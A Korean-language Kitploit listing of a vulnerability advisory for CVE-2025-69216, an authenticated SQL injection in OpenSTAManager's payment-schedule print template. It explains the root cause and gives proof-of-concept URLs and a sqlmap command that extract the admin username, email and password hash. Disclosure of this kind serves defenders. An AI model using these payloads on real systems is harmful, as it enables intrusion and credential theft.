Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/lukasz-rybak/cve-2025-69216
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationDatabase Security
GitHublukasz-rybak/cve-2025-69216

CVE-2025-69216

CVE-2025-69216 - OpenSTAManager의 Scadenzario Print Template에서 SQL Injection 취약점이 발견되었습니다

저장소 보기
4개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-69216: OpenSTAManager의 Scadenzario 인쇄 템플릿에서 발견된 SQL 인젝션 취약점

개요

필드세부 정보
CVE IDCVE-2025-69216
심각도HIGH
보안 권고보안 권고 보기
발견자Lukasz Rybak

영향을 받는 제품

  • devcode-it/openstamanager (버전: <= 2.9.8)

CWE 분류

  • CWE-89: SQL 명령에 사용되는 특수 요소의 부적절한 중화 ('SQL Injection')

상세 정보

요약

OpenSTAManager의 Scadenzario(결제 일정) 인쇄 템플릿에서 발견된 인증된 SQL 인젝션 취약점으로 인해, 모든 인증된 사용자가 관리자 자격 증명, 고객 정보, 재무 기록을 포함한 데이터베이스의 민감한 데이터를 추출할 수 있습니다. 이 취약점은 오류 기반 SQL 인젝션 기법을 통해 데이터베이스에 대한 완전한 읽기 액세스를 가능하게 합니다.

세부 내용

이 취약점은 templates/scadenzario/init.php의 46번째 줄에 존재하며, id_anagrafica 매개변수가 적절한 검증 없이 SQL 쿼리에 직접 연결됩니다:

취약한 코드:

root@kitploit:~
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
    $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
    $id_anagrafica = get('id_anagrafica');
}

get() 함수는 검증 없이 GET/POST 매개변수에서 사용자 입력을 가져옵니다. 매개변수 값은 애플리케이션의 prepare() 검증 함수를 사용하는 대신 문자열 연결을 통해 SQL 쿼리 문자열에 직접 삽입되어 SQL 인젝션 공격을 가능하게 합니다.

근본 원인:

  • 입력 검증을 위한 prepare() 함수 미사용
  • SQL 쿼리 구성 시 직접적인 문자열 연결
  • 입력 검증 또는 타입 검사 부재

영향을 받는 엔드포인트:

root@kitploit:~
/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]

영향을 받는 파일:

  • templates/scadenzario/init.php (46번째 줄) - 주요 취약점
  • templates/scadenzario/init.php (34, 40번째 줄) - 날짜 매개변수와 관련된 유사한 패턴
  • pdfgen.php - 템플릿 렌더링의 진입점

PoC (개념 증명)

사전 요구 사항

  • 유효한 인증 세션 (모든 사용자 역할)

악용 단계

1. 취약점 확인 - 기본 구문 오류 테스트:

root@kitploit:~
 http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20

애플리케이션 응답에 SQL 구문 오류 표시됨

image

2. 데이터베이스 버전 추출 - 오류 기반 SQLi:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221

결과: ~8.3.0~ (MySQL 버전)

image

3. 데이터베이스 이름 추출:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221

결과: ~openstamanager~

image

4. 관리자 사용자 이름 추출:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

결과: ~admin~ image


5. 관리자 이메일 추출:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

결과: 관리자 이메일 주소

image

6. 비밀번호 해시 추출 (부분 - XPATH 31자 제한):

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

결과: bcrypt 비밀번호 해시

image

7. SQLMap을 이용한 자동화 악용:

요청 파일 sqli_osm.req 생성:

root@kitploit:~
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0

SQLMap 실행:

root@kitploit:~
sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs

SQLMap이 확인한 인젝션 유형:

  • ✅ Boolean 기반 블라인드 SQL 인젝션
  • ✅ 오류 기반 SQL 인젝션 (MySQL >= 5.6 GTID_SUBSET)
  • ✅ 시간 기반 블라인드 SQL 인젝션 (SLEEP)
image

영향

영향을 받는 대상:

  • ✅ 모든 인증된 사용자 - 유효한 자격 증명을 가진 모든 사용자가 이 취약점을 악용할 수 있음
  • ✅ 낮은 권한의 사용자 - 최소 권한만 가진 사용자도 관리자 수준의 데이터에 접근할 수 있음
  • ✅ 모든 OpenSTAManager 설치본 - 최신 master 브랜치에 취약점이 존재함

기여

Łukasz Rybak이 보고함

참고 자료

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69216
  • https://github.com/advisories/GHSA-q6g3-fv43-m2w6

고지 사항

이 CVE는 조정된 취약점 공개 절차에 따라 책임감 있게 공개되었습니다. 여기에 제공된 정보는 교육 및 방어 목적으로만 사용됩니다.

도구 다운로드